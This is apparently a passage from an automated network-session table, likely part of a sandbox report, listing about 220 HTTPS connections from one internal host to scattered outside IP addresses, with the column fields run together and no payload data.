                                      19187192.168.2.1433882205.28.232.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19188192.168.2.1446206165.25.191.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19189192.168.2.1437708219.120.151.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19190192.168.2.1444112173.49.215.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19191192.168.2.1453990180.234.236.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19192192.168.2.1446416212.45.230.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19193192.168.2.1447884169.170.22.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19194192.168.2.145837660.139.225.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19195192.168.2.1439892134.81.239.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19196192.168.2.144903272.147.164.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19197192.168.2.1439668115.63.243.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19198192.168.2.1458618150.201.53.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19199192.168.2.1456490135.243.185.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19200192.168.2.144462888.45.55.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19201192.168.2.145825668.231.183.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19202192.168.2.143699668.159.71.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19203192.168.2.1460980184.42.67.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19204192.168.2.1453222112.31.217.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19205192.168.2.146027823.19.30.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19206192.168.2.1460336197.241.219.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19207192.168.2.143358870.166.151.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19208192.168.2.143715497.188.53.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19209192.168.2.1458126155.124.251.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19210192.168.2.1446176174.128.84.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19211192.168.2.1434792183.38.238.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19212192.168.2.144656866.174.122.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19213192.168.2.144250443.52.115.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19214192.168.2.1456050172.2.133.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19215192.168.2.1454782194.119.56.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19216192.168.2.1438068130.220.65.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19217192.168.2.144375867.17.128.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19218192.168.2.14478525.97.73.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19219192.168.2.1437434196.111.127.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19220192.168.2.1434680208.222.65.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19221192.168.2.1459174218.22.173.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19222192.168.2.144966484.184.245.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19223192.168.2.1435776146.137.111.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19224192.168.2.1458926208.197.17.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19225192.168.2.145360237.56.179.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19226192.168.2.1457000207.34.196.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19227192.168.2.145575098.150.64.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19228192.168.2.145702650.246.149.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19229192.168.2.143470225.156.202.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19230192.168.2.145208857.227.129.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19231192.168.2.1459296197.104.110.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19232192.168.2.144581845.30.239.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19233192.168.2.1458890174.177.206.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19234192.168.2.1456916171.103.166.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19235192.168.2.1444372205.212.244.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19236192.168.2.14393801.124.9.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19237192.168.2.14556942.50.194.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19238192.168.2.144918850.210.173.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19239192.168.2.1448236217.38.216.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19240192.168.2.1448586172.110.96.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19241192.168.2.144591297.76.74.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19242192.168.2.1458340183.237.170.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19243192.168.2.1446260181.97.232.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19244192.168.2.145444048.63.236.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19245192.168.2.1447526164.179.2.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19246192.168.2.144079434.201.118.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19247192.168.2.145143432.102.44.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19248192.168.2.1449654180.103.46.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19249192.168.2.1442106219.160.23.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19250192.168.2.1449550165.118.154.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19251192.168.2.1450802145.95.98.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19252192.168.2.1443604150.254.77.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19253192.168.2.1435042158.182.251.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19254192.168.2.1460954191.251.31.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19255192.168.2.1434356155.219.46.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19256192.168.2.144769088.69.163.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19257192.168.2.1454918118.134.64.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19258192.168.2.1452002160.119.93.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19259192.168.2.143955846.36.116.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19260192.168.2.1437560131.173.146.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19261192.168.2.1458190107.168.107.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19262192.168.2.143876289.34.40.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19263192.168.2.1449346204.142.234.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19264192.168.2.144551427.143.107.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19265192.168.2.1457256147.60.201.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19266192.168.2.1453642172.45.163.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19267192.168.2.144964063.149.102.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19268192.168.2.1460196164.201.184.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19269192.168.2.1446746186.195.76.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19270192.168.2.146090447.26.64.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19271192.168.2.1451976203.113.151.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19272192.168.2.1444772128.93.104.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19273192.168.2.1458346105.191.59.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19274192.168.2.143860495.240.30.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19275192.168.2.1449282186.205.94.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19276192.168.2.1437498144.147.138.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19277192.168.2.1447216202.224.104.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19278192.168.2.1445130130.165.147.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19279192.168.2.145903627.221.200.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19280192.168.2.1451106174.2.53.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19281192.168.2.145738092.241.110.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19282192.168.2.1458262157.255.179.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19283192.168.2.1454324151.142.30.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19284192.168.2.1452642119.249.151.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19285192.168.2.1435356136.2.180.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19286192.168.2.144996420.118.189.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19287192.168.2.1459312176.0.10.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19288192.168.2.144560279.73.132.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19289192.168.2.143655462.191.22.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19290192.168.2.1456712180.147.84.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19291192.168.2.144392095.145.192.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19292192.168.2.145344873.162.179.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19293192.168.2.1434362169.64.158.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19294192.168.2.1435420161.213.106.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19295192.168.2.1447088158.24.252.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19296192.168.2.143402063.203.79.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19297192.168.2.1456918194.239.133.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19298192.168.2.1442832210.213.91.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19299192.168.2.1448898197.4.154.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19300192.168.2.144863639.20.224.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19301192.168.2.1452964122.53.38.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19302192.168.2.1444454115.43.36.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19303192.168.2.1442848138.109.174.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19304192.168.2.143426078.237.197.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19305192.168.2.1446262166.28.60.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19306192.168.2.145579038.154.24.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19307192.168.2.144910074.116.196.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19308192.168.2.1441872213.215.243.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19309192.168.2.1438086208.131.224.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19310192.168.2.1459416153.240.15.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19311192.168.2.1443110159.49.166.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19312192.168.2.1444644156.84.255.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19313192.168.2.1453486112.88.46.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19314192.168.2.1453792196.197.96.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19315192.168.2.1437428125.179.220.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19316192.168.2.1440306140.232.159.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19317192.168.2.1434590223.237.213.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19318192.168.2.1459238116.181.134.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19319192.168.2.144255646.91.14.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19320192.168.2.143956071.84.55.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19321192.168.2.143806423.218.127.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19322192.168.2.1447970181.92.224.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19323192.168.2.144404635.0.227.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19324192.168.2.145801423.62.119.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19325192.168.2.1456640194.189.18.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19326192.168.2.146099459.212.146.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19327192.168.2.145908217.25.61.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19328192.168.2.1442014129.206.57.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19329192.168.2.143657497.99.77.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19330192.168.2.1443422188.48.28.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19331192.168.2.1443518181.202.81.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19332192.168.2.1440668222.59.30.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19333192.168.2.144428890.221.161.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19334192.168.2.1438962210.48.153.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19335192.168.2.1443128173.246.147.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19336192.168.2.145822825.153.145.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19337192.168.2.1456992141.205.133.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19338192.168.2.143459691.145.143.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19339192.168.2.1456206122.230.148.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19340192.168.2.144668064.173.199.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19341192.168.2.1441834118.8.79.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19342192.168.2.143595898.84.118.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19343192.168.2.1435750182.203.217.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19344192.168.2.143809039.3.21.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19345192.168.2.1447330109.101.233.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19346192.168.2.1459074161.227.103.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19347192.168.2.144764296.238.77.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19348192.168.2.144541239.100.251.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19349192.168.2.1448918220.168.15.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19350192.168.2.1446644155.157.101.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19351192.168.2.1451142192.21.168.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19352192.168.2.143341685.168.34.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19353192.168.2.1436372219.229.223.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19354192.168.2.143383899.12.247.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19355192.168.2.1452590108.178.139.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19356192.168.2.144401057.43.192.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19357192.168.2.146024251.63.227.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19358192.168.2.1445498203.200.235.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19359192.168.2.1450358117.4.197.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19360192.168.2.144064284.157.11.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19361192.168.2.1458286114.239.7.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19362192.168.2.1441792113.152.239.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19363192.168.2.1452492221.218.5.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19364192.168.2.144147466.252.183.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19365192.168.2.1439198119.148.80.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19366192.168.2.143916254.51.80.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19367192.168.2.145682867.202.43.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19368192.168.2.144791267.170.117.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19369192.168.2.143675852.173.19.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19370192.168.2.146017075.52.230.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19371192.168.2.1460710178.156.139.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19372192.168.2.1460094142.82.0.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19373192.168.2.1440780159.162.40.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19374192.168.2.1444502169.176.79.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19375192.168.2.1444980164.4.188.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19376192.168.2.1444864153.140.200.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19377192.168.2.143383890.83.9.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19378192.168.2.143620646.92.162.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19379192.168.2.1455878179.174.72.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19380192.168.2.1458566217.141.134.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19381192.168.2.145129892.13.163.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19382192.168.2.144657444.27.185.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19383192.168.2.1441936108.249.198.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19384192.168.2.144527240.66.165.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19385192.168.2.1443136119.243.34.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19386192.168.2.145076293.52.35.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19387192.168.2.1433776198.121.244.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19388192.168.2.1460110120.151.222.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19389192.168.2.1434678111.84.228.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19390192.168.2.1437738211.231.43.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19391192.168.2.1448092211.237.128.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19392192.168.2.14420802.184.149.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19393192.168.2.1459038186.131.161.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19394192.168.2.14574225.177.67.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19395192.168.2.144997860.5.187.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19396192.168.2.143507831.82.14.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19397192.168.2.145260687.174.121.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19398192.168.2.1456238124.43.199.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19399192.168.2.1459028126.48.81.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19400192.168.2.1444138102.130.18.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19401192.168.2.1446478122.50.142.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19402192.168.2.143757827.236.45.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19403192.168.2.1446790109.232.201.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19404192.168.2.1455626134.162.10.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19405192.168.2.144831680.103.158.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19406192.168.2.143375032.75.236.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19407192.168.2.144170282.194.106.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19408192.168.2.143710696.54.110.87443
                                      TimestampBytes transferredDirectionData


